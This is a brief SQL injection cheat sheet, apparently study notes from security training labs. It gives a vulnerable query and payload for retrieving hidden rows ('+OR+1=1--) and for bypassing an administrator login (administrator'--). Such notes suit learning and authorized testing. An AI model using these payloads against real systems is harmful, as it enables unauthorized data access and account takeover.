SQL Injection¶
retrieval of hidden data¶
Query: SELECT * FROM products WHERE category = 'Gifts' AND released = 1
Payload: '+OR+1=1--
login bypass¶
Query: SELECT * FROM users WHERE username = 'user' AND password = 'password'
Payload: administrator'--